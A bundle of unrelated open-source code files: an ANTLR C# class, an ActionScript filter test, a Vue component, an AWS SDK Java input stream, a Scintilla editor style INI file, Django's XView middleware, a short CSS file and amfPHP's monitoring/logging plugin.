// This file isn't generated, but this comment is necessary to exclude it from StyleCop analysis. // <auto-generated/> /* Copyright (c) 2012-2017 The ANTLR Project. All rights reserved. * Use of this file is governed by the BSD 3-clause license that * can be found in the LICENSE.txt file in the project root. */ using Antlr4.Runtime.Atn; using Antlr4.Runtime.Sharpen; namespace Antlr4.Runtime.Atn { /// <author>Sam Harwell</author> internal abstract class AbstractPredicateTransition : Transition { public AbstractPredicateTransition(ATNState target) : base(target) { } } }
{ "pile_set_name": "Github" }
package org.hamcrest.filter { import org.flexunit.Assert; import org.hamcrest.core.not; import org.hamcrest.text.containsString; import org.hamcrest.text.emptyString; public class FilterFunctionTest extends Assert { private var filterFunction:FilterFunction; [Before] public function setup():void { filterFunction = new FilterFunction(); } [Test] public function returnsTrueIfNoMatcher():void { filterFunction.matcher = null; assertTrue( filterFunction.filter( "test" ) ); } [Test] public function returnsTrueIfValueMatchesMatcher():void { filterFunction.matcher = not( emptyString() ); assertTrue( filterFunction.filter( "a non-empty string" ) ); } [Test] public function returnsFalseIfValueDoesNotMatchMatcher():void { filterFunction.matcher = not( containsString("expected") ); assertFalse( filterFunction.filter( "unexpected" ) ); } } }
{ "pile_set_name": "Github" }
import Vue from 'vue/dist/vue.esm' import Vuex from 'vuex' import componentMixin from '../../component/component' import VRuntimeTemplate from "v-runtime-template" const componentDef = { mixins: [componentMixin], data: function(){ return {} }, computed: Vuex.mapState({ asyncPageTemplate: state => state.pageTemplate, loading: state => state.pageLoading }), components: { VRuntimeTemplate: VRuntimeTemplate } } let component = Vue.component('matestack-ui-core-page-content', componentDef) export default componentDef
{ "pile_set_name": "Github" }
/* * Copyright 2010-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Portions copyright 2006-2009 James Murty. Please see LICENSE.txt * for applicable license terms and NOTICE.txt for applicable notices. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing * permissions and limitations under the License. */ package com.amazonaws.services.s3.internal; import com.amazonaws.internal.SdkInputStream; import com.amazonaws.logging.Log; import com.amazonaws.logging.LogFactory; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStream; /** * A repeatable input stream for files. This input stream can be repeated an * unlimited number of times, without any limitation on when a repeat can occur. */ public class RepeatableFileInputStream extends SdkInputStream { private static final Log log = LogFactory.getLog("RepeatableFIS"); private final File file; private FileInputStream fis = null; private long bytesReadPastMarkPoint = 0; private long markPoint = 0; /** * Creates a repeatable input stream based on a file. * * @param file The file from which this input stream reads data. * @throws FileNotFoundException If the specified file doesn't exist, or * can't be opened. */ public RepeatableFileInputStream(File file) throws FileNotFoundException { if (file == null) { throw new IllegalArgumentException("File cannot be null"); } this.fis = new FileInputStream(file); this.file = file; } /** * Returns the File this stream is reading data from. * * @return the File this stream is reading data from. */ public File getFile() { return file; } /** * Resets the input stream to the last mark point, or the beginning of the * stream if there is no mark point, by creating a new FileInputStream based * on the underlying file. * * @throws IOException when the FileInputStream cannot be re-created. */ @Override public void reset() throws IOException { this.fis.close(); abortIfNeeded(); this.fis = new FileInputStream(file); long skipped = 0; long toSkip = markPoint; while (toSkip > 0) { skipped = this.fis.skip(toSkip); toSkip -= skipped; } if (log.isDebugEnabled()) { log.debug("Reset to mark point " + markPoint + " after returning " + bytesReadPastMarkPoint + " bytes"); } this.bytesReadPastMarkPoint = 0; } @Override public boolean markSupported() { return true; } @Override public void mark(int readlimit) { abortIfNeeded(); this.markPoint += bytesReadPastMarkPoint; this.bytesReadPastMarkPoint = 0; if (log.isDebugEnabled()) { log.debug("Input stream marked at " + this.markPoint + " bytes"); } } @Override public int available() throws IOException { abortIfNeeded(); return fis.available(); } @Override public void close() throws IOException { fis.close(); abortIfNeeded(); } @Override public int read() throws IOException { abortIfNeeded(); int byteRead = fis.read(); if (byteRead != -1) { bytesReadPastMarkPoint++; return byteRead; } else { return -1; } } @Override public long skip(long n) throws IOException { abortIfNeeded(); long skipped = fis.skip(n); bytesReadPastMarkPoint += skipped; return skipped; } @Override public int read(byte[] arg0, int arg1, int arg2) throws IOException { abortIfNeeded(); int count = fis.read(arg0, arg1, arg2); bytesReadPastMarkPoint += count; return count; } @Override public InputStream getWrappedInputStream() { return fis; } }
{ "pile_set_name": "Github" }
[General] FontFamily=Consolas FontSize=12 CaretForegroundColor=11004961 CaretLineBackgroundColor=0 MatchedBraceForegroundColor=15800088 MatchedBraceBackgroundColor=1536 UnmatchedBraceForegroundColor=1536 UnmatchedBraceBackgroundColor=12303291 MarkerForegroundColor=186882 MarkerBackgroundColor=0 FoldMarginFirstColor=8704 FoldMarginSecondColor=8704 IndentationGuidesForegroundColor=30464 IndentationGuidesBackgroundColor=1536 IndicatorForegroundColor=128 IndicatorOutlineColor=240 MarginsForegroundColor=30464 MarginsBackgroundColor=4352 [Scintilla] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;color = text color -> [0..16777215] ;; ;;eolfil = end-of-line fill -> true | false ;; ;;font = family, size, bold, italic, underline ;; ;;font2 = family, size, bold, italic, underline ;; ;;paper = background color -> [0..16777215] ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Default Lua\style0\color=16777215 Lua\style0\eolfill=false Lua\style0\font=Consolas, 12, 0, 0, 0 Lua\style0\font2=Consolas, 12, 0, 0, 0 Lua\style0\paper=4352 ;Comment Lua\style1\color=33300 Lua\style1\eolfill=false Lua\style1\font=Consolas, 12, 0, 0, 0 Lua\style1\font2=Consolas, 10, 1, 0, 0 Lua\style1\paper=4352 ;LineComment Lua\style2\color=33300 Lua\style2\eolfill=true Lua\style2\font=Consolas, 12, 0, 0, 0 Lua\style2\font2=Consolas, 11, 0, 0, 1 Lua\style2\paper=1536 ;Number Lua\style4\color=15067138 Lua\style4\eolfill=false Lua\style4\font=Consolas, 12, 0, 0, 0 Lua\style4\font2=Consolas, 12, 1, 0, 0 Lua\style4\paper=1536 ;Keyword Lua\style5\color=186882 Lua\style5\eolfill=false Lua\style5\font=Consolas, 12, 0, 0, 0 Lua\style5\font2=Consolas, 12, 1, 0, 0 Lua\style5\paper=1536 ;String Lua\style6\color=15067138 Lua\style6\eolfill=false Lua\style6\font=Consolas, 12, 0, 0, 0 Lua\style6\font2=Consolas, 12, 0, 0, 0 Lua\style6\paper=4352 ;Character Lua\style7\color=15067138 Lua\style7\eolfill=false Lua\style7\font=Consolas, 12, 0, 0, 0 Lua\style7\font2=Consolas, 12, 0, 0, 0 Lua\style7\paper=1536 ;LiteralString Lua\style8\color=250371 Lua\style8\eolfill=false Lua\style8\font=Consolas, 12, 0, 0, 0 Lua\style8\font2=Consolas, 11, 1, 0, 0 Lua\style8\paper=0 ;Preprocessor Lua\style9\color=8355584 Lua\style9\eolfill=false Lua\style9\font=Consolas, 12, 0, 0, 0 Lua\style9\font2=Consolas, 12, 0, 0, 0 Lua\style9\paper=1536 ;Operator Lua\style10\color=15527662 Lua\style10\eolfill=false Lua\style10\font=Consolas, 12, 0, 0, 0 Lua\style10\font2=Consolas, 12, 0, 0, 0 Lua\style10\paper=1536 ;Identifier Lua\style11\color=7848704 Lua\style11\eolfill=false Lua\style11\font=Consolas, 12, 0, 0, 0 Lua\style11\font2=Consolas, 12, 0, 0, 0 Lua\style11\paper=1536 ;UnclosedString Lua\style12\color=1536 Lua\style12\eolfill=false Lua\style12\font=Consolas, 12, 0, 0, 1 Lua\style12\font2=Consolas, 12, 0, 0, 1 Lua\style12\paper=7848704 ;BasicFunctions Lua\style13\color=59550 Lua\style13\eolfill=false Lua\style13\font=Consolas, 12, 0, 0, 0 Lua\style13\font2=Consolas, 12, 0, 0, 0 Lua\style13\paper=1536 ;StringTableMathsFunctions Lua\style14\color=59550 Lua\style14\eolfill=false Lua\style14\font=Consolas, 12, 0, 0, 0 Lua\style14\font2=Consolas, 12, 0, 0, 0 Lua\style14\paper=1536 ;CoroutinesIOSystemFacilities Lua\style15\color=16619042 Lua\style15\eolfill=false Lua\style15\font=Consolas, 12, 0, 0, 0 Lua\style15\font2=Consolas, 12, 0, 0, 0 Lua\style15\paper=1536 ;KeywordSet5 Lua\style16\color=0 Lua\style16\eolfill=false Lua\style16\font=Consolas, 12, 0, 0, 0 Lua\style16\font2=Consolas, 12, 0, 0, 0 Lua\style16\paper=1536 ;KeywordSet6 Lua\style17\color=0 Lua\style17\eolfill=false Lua\style17\font=Consolas, 12, 0, 0, 0 Lua\style17\font2=Consolas, 12, 0, 0, 0 Lua\style17\paper=1536 ;KeywordSet7 Lua\style18\color=0 Lua\style18\eolfill=false Lua\style18\font=Consolas, 12, 0, 0, 0 Lua\style18\font2=Consolas, 12, 0, 0, 0 Lua\style18\paper=1536 ;KeywordSet8 Lua\style19\color=0 Lua\style19\eolfill=false Lua\style19\font=Consolas, 12, 0, 0, 0 Lua\style19\font2=Consolas, 12, 0, 0, 0 Lua\style19\paper=1536 ;Label Lua\style20\color=8355584 Lua\style20\eolfill=false Lua\style20\font=Consolas, 12, 0, 0, 0 Lua\style20\font2=Consolas, 12, 0, 0, 0 Lua\style20\paper=1536 ; Lua\properties\foldcompact=true ; Lua\defaultcolor=16777215 Lua\defaultpaper=1536 Lua\defaultfont=Consolas, 12, 0, 0, 0 Lua\defaultfont2=Consolas, 12, 0, 0, 0 Lua\autoindentstyle=-1 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Default C%2B%2B\style0\color=16777215 C%2B%2B\style0\eolfill=false C%2B%2B\style0\font=Consolas, 12, 0, 0, 0 C%2B%2B\style0\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style0\paper=1536 ;Comment C%2B%2B\style1\color=7630941 C%2B%2B\style1\eolfill=false C%2B%2B\style1\font=Consolas, 12, 0, 0, 0 C%2B%2B\style1\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style1\paper=1536 ;CommentLine C%2B%2B\style2\color=7630941 C%2B%2B\style2\eolfill=false C%2B%2B\style2\font=Consolas, 12, 0, 0, 0 C%2B%2B\style2\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style2\paper=1536 ;CommentDoc C%2B%2B\style3\color=7630941 C%2B%2B\style3\eolfill=false C%2B%2B\style3\font=Consolas, 12, 0, 0, 0 C%2B%2B\style3\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style3\paper=1536 ;Number C%2B%2B\style4\color=11436543 C%2B%2B\style4\eolfill=false C%2B%2B\style4\font=Consolas, 12, 0, 0, 0 C%2B%2B\style4\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style4\paper=1536 ;Keyword C%2B%2B\style5\color=6805743 C%2B%2B\style5\eolfill=false C%2B%2B\style5\font=Consolas, 12, 0, 0, 0 C%2B%2B\style5\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style5\paper=1536 ;DoubleQuotedString C%2B%2B\style6\color=15129460 C%2B%2B\style6\eolfill=false C%2B%2B\style6\font=Consolas, 12, 0, 0, 0 C%2B%2B\style6\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style6\paper=1536 ;SingleQuotedString C%2B%2B\style7\color=15129460 C%2B%2B\style7\eolfill=false C%2B%2B\style7\font=Consolas, 12, 0, 0, 0 C%2B%2B\style7\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style7\paper=1536 ;UUID C%2B%2B\style8\color=15388106 C%2B%2B\style8\eolfill=false C%2B%2B\style8\font=Consolas, 12, 0, 0, 0 C%2B%2B\style8\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style8\paper=1536 ;PreProcessor C%2B%2B\style9\color=8355584 C%2B%2B\style9\eolfill=false C%2B%2B\style9\font=Consolas, 12, 0, 0, 0 C%2B%2B\style9\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style9\paper=1536 ;Operator C%2B%2B\style10\color=15790320 C%2B%2B\style10\eolfill=false C%2B%2B\style10\font=Consolas, 12, 0, 0, 0 C%2B%2B\style10\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style10\paper=1536 ;Identifier C%2B%2B\style11\color=15790320 C%2B%2B\style11\eolfill=false C%2B%2B\style11\font=Consolas, 12, 0, 0, 0 C%2B%2B\style11\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style11\paper=1536 ;UnclosedString C%2B%2B\style12\color=15129460 C%2B%2B\style12\eolfill=true C%2B%2B\style12\font=Consolas, 12, 0, 0, 1 C%2B%2B\style12\font2=Consolas, 12, 0, 0, 1 C%2B%2B\style12\paper=14729440 ;VerbatimString C%2B%2B\style13\color=15129460 C%2B%2B\style13\eolfill=true C%2B%2B\style13\font=Consolas, 12, 0, 0, 0 C%2B%2B\style13\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style13\paper=14745568 ;Regex C%2B%2B\style14\color=15129460 C%2B%2B\style14\eolfill=true C%2B%2B\style14\font=Consolas, 12, 0, 0, 0 C%2B%2B\style14\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style14\paper=14741728 ;CommentLineDoc C%2B%2B\style15\color=7630941 C%2B%2B\style15\eolfill=false C%2B%2B\style15\font=Consolas, 12, 0, 0, 0 C%2B%2B\style15\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style15\paper=1536 ;KeywordSet2 C%2B%2B\style16\color=16619042 C%2B%2B\style16\eolfill=false C%2B%2B\style16\font=Consolas, 12, 0, 0, 0 C%2B%2B\style16\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style16\paper=1536 ;CommentDocKeyword C%2B%2B\style17\color=7630941 C%2B%2B\style17\eolfill=false C%2B%2B\style17\font=Consolas, 12, 0, 0, 0 C%2B%2B\style17\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style17\paper=1536 ;CommentDocKeywordError C%2B%2B\style18\color=7630941 C%2B%2B\style18\eolfill=false C%2B%2B\style18\font=Consolas, 12, 0, 0, 0 C%2B%2B\style18\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style18\paper=1536 ;GlobalClass C%2B%2B\style19\color=16777215 C%2B%2B\style19\eolfill=false C%2B%2B\style19\font=Consolas, 12, 0, 0, 0 C%2B%2B\style19\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style19\paper=1536 ;RawString C%2B%2B\style20\color=15129460 C%2B%2B\style20\eolfill=false C%2B%2B\style20\font=Consolas, 12, 0, 0, 0 C%2B%2B\style20\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style20\paper=16774143 ;TripleQuotedVerbatimString C%2B%2B\style21\color=15129460 C%2B%2B\style21\eolfill=true C%2B%2B\style21\font=Consolas, 12, 0, 0, 0 C%2B%2B\style21\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style21\paper=14745568 ;HashQuotedString C%2B%2B\style22\color=15129460 C%2B%2B\style22\eolfill=true C%2B%2B\style22\font=Consolas, 12, 0, 0, 0 C%2B%2B\style22\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style22\paper=15204311 ;PreProcessorComment C%2B%2B\style23\color=7630941 C%2B%2B\style23\eolfill=false C%2B%2B\style23\font=Consolas, 12, 0, 0, 0 C%2B%2B\style23\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style23\paper=1536 ;PreProcessorCommentLineDoc C%2B%2B\style24\color=7630941 C%2B%2B\style24\eolfill=false C%2B%2B\style24\font=Consolas, 12, 0, 0, 0 C%2B%2B\style24\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style24\paper=1536 ; C%2B%2B\style40\color=11571376 C%2B%2B\style40\eolfill=false C%2B%2B\style40\font=Consolas, 12, 0, 0, 0 C%2B%2B\style40\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style40\paper=16774143 ; C%2B%2B\style42\color=9482384 C%2B%2B\style42\eolfill=true C%2B%2B\style42\font=Consolas, 12, 0, 0, 0 C%2B%2B\style42\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style42\paper=14745568 ; C%2B%2B\style44\color=9482384 C%2B%2B\style44\eolfill=true C%2B%2B\style44\font=Consolas, 12, 0, 0, 0 C%2B%2B\style44\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style44\paper=15204311 ; C%2B%2B\style46\color=10535056 C%2B%2B\style46\eolfill=false C%2B%2B\style46\font=Consolas, 12, 0, 0, 0 C%2B%2B\style46\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style46\paper=1536 ;InactiveDefault C%2B%2B\style64\color=12632256 C%2B%2B\style64\eolfill=false C%2B%2B\style64\font=Consolas, 12, 0, 0, 0 C%2B%2B\style64\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style64\paper=1536 ; C%2B%2B\style65\color=9482384 C%2B%2B\style65\eolfill=false C%2B%2B\style65\font=Consolas, 12, 0, 0, 0 C%2B%2B\style65\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style65\paper=1536 ; C%2B%2B\style66\color=9482384 C%2B%2B\style66\eolfill=false C%2B%2B\style66\font=Consolas, 12, 0, 0, 0 C%2B%2B\style66\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style66\paper=1536 ; C%2B%2B\style67\color=13684944 C%2B%2B\style67\eolfill=false C%2B%2B\style67\font=Consolas, 12, 0, 0, 0 C%2B%2B\style67\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style67\paper=1536 ; C%2B%2B\style68\color=9482384 C%2B%2B\style68\eolfill=false C%2B%2B\style68\font=Consolas, 12, 0, 0, 0 C%2B%2B\style68\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style68\paper=1536 ; C%2B%2B\style69\color=9474224 C%2B%2B\style69\eolfill=false C%2B%2B\style69\font=Consolas, 12, 1, 0, 0 C%2B%2B\style69\font2=Consolas, 12, 1, 0, 0 C%2B%2B\style69\paper=1536 ; C%2B%2B\style70\color=11571376 C%2B%2B\style70\eolfill=false C%2B%2B\style70\font=Consolas, 12, 0, 0, 0 C%2B%2B\style70\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style70\paper=1536 ; C%2B%2B\style71\color=11571376 C%2B%2B\style71\eolfill=false C%2B%2B\style71\font=Consolas, 12, 0, 0, 0 C%2B%2B\style71\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style71\paper=1536 ; C%2B%2B\style72\color=12632256 C%2B%2B\style72\eolfill=false C%2B%2B\style72\font=Consolas, 12, 0, 0, 0 C%2B%2B\style72\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style72\paper=1536 ; C%2B%2B\style73\color=11579536 C%2B%2B\style73\eolfill=false C%2B%2B\style73\font=Consolas, 12, 0, 0, 0 C%2B%2B\style73\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style73\paper=1536 ; C%2B%2B\style74\color=11579568 C%2B%2B\style74\eolfill=false C%2B%2B\style74\font=Consolas, 12, 1, 0, 0 C%2B%2B\style74\font2=Consolas, 12, 1, 0, 0 C%2B%2B\style74\paper=1536 ; C%2B%2B\style75\color=11579568 C%2B%2B\style75\eolfill=false C%2B%2B\style75\font=Consolas, 12, 0, 0, 0 C%2B%2B\style75\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style75\paper=1536 ; C%2B%2B\style76\color=0 C%2B%2B\style76\eolfill=true C%2B%2B\style76\font=Consolas, 12, 0, 0, 0 C%2B%2B\style76\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style76\paper=14729440 ; C%2B%2B\style77\color=9482384 C%2B%2B\style77\eolfill=true C%2B%2B\style77\font=Consolas, 12, 0, 0, 0 C%2B%2B\style77\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style77\paper=14745568 ; C%2B%2B\style78\color=8367999 C%2B%2B\style78\eolfill=true C%2B%2B\style78\font=Consolas, 12, 0, 0, 0 C%2B%2B\style78\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style78\paper=14741728 ; C%2B%2B\style79\color=12632256 C%2B%2B\style79\eolfill=false C%2B%2B\style79\font=Consolas, 12, 0, 0, 0 C%2B%2B\style79\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style79\paper=1536 ; C%2B%2B\style80\color=12632256 C%2B%2B\style80\eolfill=false C%2B%2B\style80\font=Consolas, 12, 0, 0, 0 C%2B%2B\style80\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style80\paper=1536 ; C%2B%2B\style81\color=12632256 C%2B%2B\style81\eolfill=false C%2B%2B\style81\font=Consolas, 12, 0, 0, 0 C%2B%2B\style81\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style81\paper=1536 ; C%2B%2B\style82\color=12632256 C%2B%2B\style82\eolfill=false C%2B%2B\style82\font=Consolas, 12, 0, 0, 0 C%2B%2B\style82\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style82\paper=1536 ; C%2B%2B\style83\color=11579568 C%2B%2B\style83\eolfill=false C%2B%2B\style83\font=Consolas, 12, 0, 0, 0 C%2B%2B\style83\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style83\paper=1536 ; C%2B%2B\style88\color=12632256 C%2B%2B\style88\eolfill=false C%2B%2B\style88\font=Consolas, 12, 0, 0, 0 C%2B%2B\style88\font2=Consolas, 12, 0, 0, 0 C%2B%2B\style88\paper=1536 ; C%2B%2B\properties\foldatelse=false C%2B%2B\properties\foldcomments=false C%2B%2B\properties\foldcompact=true C%2B%2B\properties\foldpreprocessor=true C%2B%2B\properties\stylepreprocessor=false C%2B%2B\properties\dollars=true C%2B%2B\properties\highlighttriple=false C%2B%2B\properties\highlighthash=false ; C%2B%2B\defaultcolor=16777215 C%2B%2B\defaultpaper=1536 C%2B%2B\defaultfont=Consolas, 12, 0, 0, 0 C%2B%2B\defaultfont2=Consolas, 12, 0, 0, 0 C%2B%2B\autoindentstyle=-1
{ "pile_set_name": "Github" }
from django.conf import settings from django import http class XViewMiddleware(object): """ Adds an X-View header to internal HEAD requests -- used by the documentation system. """ def process_view(self, request, view_func, view_args, view_kwargs): """ If the request method is HEAD and either the IP is internal or the user is a logged-in staff member, quickly return with an x-header indicating the view function. This is used by the documentation module to lookup the view function for an arbitrary page. """ assert hasattr(request, 'user'), ( "The XView middleware requires authentication middleware to be " "installed. Edit your MIDDLEWARE_CLASSES setting to insert " "'django.contrib.auth.middleware.AuthenticationMiddleware'.") if request.method == 'HEAD' and (request.META.get('REMOTE_ADDR') in settings.INTERNAL_IPS or (request.user.is_active and request.user.is_staff)): response = http.HttpResponse() response['X-View'] = "%s.%s" % (view_func.__module__, view_func.__name__) return response
{ "pile_set_name": "Github" }
@charset "UTF-8"; /* * jQuery File Upload Plugin CSS Example * https://github.com/blueimp/jQuery-File-Upload * * Copyright 2013, Sebastian Tschan * https://blueimp.net * * Licensed under the MIT license: * https://opensource.org/licenses/MIT */ body { padding-top: 60px; }
{ "pile_set_name": "Github" }
<?php /** * This file is part of amfPHP * * LICENSE * * This source file is subject to the license that is bundled * with this package in the file license.txt. */ /** * includes */ require_once dirname(__FILE__) . '/AmfphpMonitorService.php'; /** * logs monitoring information, and makes it possible to toggle logging and retrieve the data via the AmfphpMonitorService. * If the log file is not writable or its size is superior to maxLogFileSize, * logging shall fail silently. This is designed to avoid errors being generated * when a developer forgets to turn off monitoring, and to allow the plugin to be enabled * by default * * The log file is by default at [AmfphpMonitor plugin folder]/log.txt.php * To change this set 'logPath' in the config. * * * * note: Logging multiple times with the same name is not possible! * @todo maybe change storage mechanism to sqlite. This means checking that it is indeed available, checking if performance is ok etc., so it might be a bit heavy handed. * * @author Ariel Sommeria-klein * @package Amfphp_Plugins_Monitor */ class AmfphpMonitor { /** * path to log file. If it is publicly accessible * @var string */ protected $logPath; /** * service and method name. If they are multiple calls in request, they are spearated with a ', ' * @var string */ protected $uri; /** * was there an exception during service call. * todo. unused. * @var boolean */ protected $isException; /** * last measured time, or start time * @var float */ protected static $lastMeasuredTime; /** * various times. for example ['startD' => 12 , 'stopD' => 30 ] * means start of deserialization at 12 ms after the request was received, * and end of deserialization 30 ms after start of deserialization. * @var array */ protected static $times; /** * restrict access to amfphp_admin, the role set when using the back office. default is true. * @var boolean */ protected $restrictAccess = true; /** * The maximum size of the log file, in bytes. Once the log is bigger than this, logging stops. * Note that this is not strict, it can overflow with the last log. * @var int */ protected $maxLogFileSize = 1000000; /** * constructor. * manages log path. If file exists at log path, adds hooks for logging. * @param array $config */ public function __construct(array $config = null) { self::$lastMeasuredTime = round(microtime(true) * 1000); self::$times = array(); $filterManager = Amfphp_Core_FilterManager::getInstance(); $filterManager->addFilter(Amfphp_Core_Gateway::FILTER_SERVICE_NAMES_2_CLASS_FIND_INFO, $this, 'filterServiceNames2ClassFindInfo'); if (isset($config['logPath'])) { $this->logPath = $config['logPath']; }else{ $this->logPath = dirname(__FILE__) . DIRECTORY_SEPARATOR . 'log.txt.php'; } AmfphpMonitorService::$logPath = $this->logPath; if(isset($config['restrictAccess'])){ $this->restrictAccess = $config['restrictAccess']; } AmfphpMonitorService::$restrictAccess = $this->restrictAccess; if(isset($config['maxLogFileSize'])){ $this->maxLogFileSize = $config['maxLogFileSize']; } AmfphpMonitorService::$maxLogFileSize = $this->maxLogFileSize; if(!is_writable($this->logPath) || !is_readable($this->logPath)){ return; } if(filesize($this->logPath) > $this->maxLogFileSize){ return; } $filterManager->addFilter(Amfphp_Core_Gateway::FILTER_DESERIALIZED_REQUEST, $this, 'filterDeserializedRequest', 0); $filterManager->addFilter(Amfphp_Core_Gateway::FILTER_DESERIALIZED_RESPONSE, $this, 'filterDeserializedResponse', 0); $filterManager->addFilter(Amfphp_Core_Gateway::FILTER_SERIALIZED_RESPONSE, $this, 'filterSerializedResponse'); } /** * measures time since previous call (or start time time if this the first call) , and stores it in the times array * public and static so that services can call this too to add custom times. * updates lastMeasuredTime * @param string $name */ public static function addTime($name){ $now = round(microtime(true) * 1000); $timeSinceLastMeasure = $now - self::$lastMeasuredTime; self::$times[$name] = $timeSinceLastMeasure; self::$lastMeasuredTime = $now; } /** * add monitor service * @param array $serviceNames2ClassFindInfo associative array of key -> class find info */ public function filterServiceNames2ClassFindInfo(array $serviceNames2ClassFindInfo) { $serviceNames2ClassFindInfo['AmfphpMonitorService'] = new Amfphp_Core_Common_ClassFindInfo(dirname(__FILE__) . '/AmfphpMonitorService.php', 'AmfphpMonitorService'); return $serviceNames2ClassFindInfo; } /** * logs the time for end of deserialization, as well as grabs the target uris(service + method) * as each request has its own format, the code here must handle all deserialized request structures. * if case not handled just don't set target uris, as data can still be useful even without them. * @param mixed $deserializedRequest */ public function filterDeserializedRequest($deserializedRequest) { self::addTime('Deserialization'); //AMF if(is_a($deserializedRequest, 'Amfphp_Core_Amf_Packet')){ //detect Flex by looking at first message. assumes that request doesn't mix simple AMF remoting with Flex Messaging $isFlex = ($deserializedRequest->messages[0]->targetUri == 'null'); //target Uri is described in Flex message for($i = 0; $i < count($deserializedRequest->messages); $i++){ if($i > 0){ //add multiple uris split with a ', ' $this->uri .= ', '; } $message = $deserializedRequest->messages[$i]; if ($isFlex){ $flexMessage = $message->data[0]; $explicitTypeField = Amfphp_Core_Amf_Constants::FIELD_EXPLICIT_TYPE; $messageType = $flexMessage->$explicitTypeField; //assumes AmfphpFlexMessaging plugin is installed, which is reasonable given that we're using Flex messaging if ($messageType == AmfphpFlexMessaging::FLEX_TYPE_COMMAND_MESSAGE) { $this->uri .= "Flex Command Message"; }else if ($messageType == AmfphpFlexMessaging::FLEX_TYPE_REMOTING_MESSAGE) { $this->uri .= $flexMessage->source . '.' . $flexMessage->operation; }else{ $this->uri .= 'Flex ' . $messageType; } }else{ $this->uri .= $message->targetUri; } } }else if(isset ($deserializedRequest->serviceName)){ //JSON $this->uri = $deserializedRequest->serviceName . '/' . $deserializedRequest->methodName; }else if(is_array($deserializedRequest) && isset ($deserializedRequest['serviceName'])){ //GET, included request $this->uri = $deserializedRequest['serviceName'] . '/' . $deserializedRequest['methodName']; } } /** * logs the time for start of serialization * @param packet $deserializedResponse */ public function filterDeserializedResponse($deserializedResponse) { self::addTime('Service Call'); } /** * logs the time for end of serialization and writes log * ignores calls to Amfphp services (checks for 'Amfphp' at beginning of name) * tries to get a lock on the file, and if not then just drops the log. * * @param mixed $rawData */ public function filterSerializedResponse($rawData) { if(substr($this->uri, 0, 6) == 'Amfphp'){ return; } if(filesize($this->logPath) > $this->maxLogFileSize){ return; } self::addTime('Serialization'); $record = new stdClass(); $record->uri = $this->uri; $record->times = self::$times; $fp = fopen($this->logPath, "a"); if (flock($fp, LOCK_EX)) { // acquire an exclusive lock fwrite($fp, "\n" . serialize($record)); fflush($fp); // flush output before releasing the lock flock($fp, LOCK_UN); // release the lock } else { echo "Couldn't get the lock!"; } fclose($fp); } } ?>
{ "pile_set_name": "Github" }
